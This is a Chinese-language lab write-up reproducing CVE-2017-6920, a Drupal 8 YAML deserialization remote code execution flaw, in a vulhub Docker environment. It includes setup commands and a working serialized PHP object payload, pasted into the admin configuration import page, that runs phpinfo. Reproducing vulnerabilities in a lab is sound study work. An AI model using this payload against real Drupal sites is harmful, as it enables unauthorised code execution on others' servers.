526互联

CVE-2017-6920漏洞复现

发布时间 2023-09-10 16:50:37作者: J1eula

前言

本文所述远程代码执行漏洞由Drupal Core的YAML解析器处理不当所导致。漏洞对应的CVE编号为CVE-2017-6920。

8.x版本&&小于8.3.4版本

漏洞环境(基于ubuntu18.04)

故事的开始:
启动漏洞环境(vulhub靶场,在cve-2017-6920文件夹中启docker):
docker-compose up -d

image-20230718211249929

访问漏洞环境(本地浏览器访问,用自己的ip):
http://your-ip:8080    //出现以下画面就行,浏览器放一边,先进行下一步

image-20230719135023169

进入docker容器(用自己的容器id):
docker ps -a    //查看正在运行的容器
docker exec -it CONTAINER ID /bin/bash  //根据容器id进入docker容器
以下图为例即为:docker exec -it d4fd7a3ae200 /bin/bash

image-20230719155847032

接下来是重点!

以下步骤皆在容器中进行

安装yaml扩展(再说一遍!在容器中!):

//换镜像源,默认带vim编辑器,所以用cat换源,可以换成自己喜欢的源
cat << EOF > /etc/apt/sources.list
deb http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ focal-backports main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal-backports main restricted universe multiverse
EOF
//导入阿里源的公钥,否则下一步更新源会报错
apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 3B4FE6ACC0B21F32 871920D1991BC93C
//安装依赖|让子弹飞一会
apt update
apt-get install gcc make autoconf libc-dev pkg-config -y
apt-get install libyaml-dev -y
重中之重!!!
//安装yaml扩展
第一种方法:
pecl install yaml
如果方法一失败,第二种方法:
apt-get install wget -y
wget https://pecl.php.net/get/yaml-2.2.3.tgz
tar -zxvf yaml-2.2.3.tgz
cd yaml-2.2.3
phpize
./configure
make&&make install
//在PHP 代码中使用 YAML 扩展提供的功能
docker-php-ext-enable yaml.so
//启用 yaml.decode_php 否则无法复现成功
echo 'yaml.decode_php = 1 = 1'>>/usr/local/etc/php/conf.d/docker-php-ext-yaml.ini
//退出并重启容器(CONTAINER ID更换为自己的容器id)
exit
docker restart CONTAINER ID
最后!!漏洞复现完成后不要忘记删除漏洞环境
删除漏洞环境(在cve-2017-6920文件夹中删除):
docker-compose down

漏洞验证

1.安装Drupal

访问http://your-ip:8080/ 将会看到drupal的安装页面,一路默认配置下一步安装。因为没有mysql环境,所以安装的时候可以选择sqlite数据库。

image-20230719135023169

image-20230719160208940

image-20230719160311921

image-20230719160708605

2.登录一个管理员账号,访问 http://your-ip:8080/admin/config/development/configuration/single/import

或者鼠标流操作:管理-->配置-->开发-->配置同步-->导入-->单一项目,配置类型选择简单配置:

image-20230719161352196

配置名称可任意填写,将payload复制到配置框中:

image-20230719161837321

payload在这里!!
!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"

点击导入,即执行phpinfo函数,证明漏洞存在:

image-20230719162003107

修复建议

升级最新版本!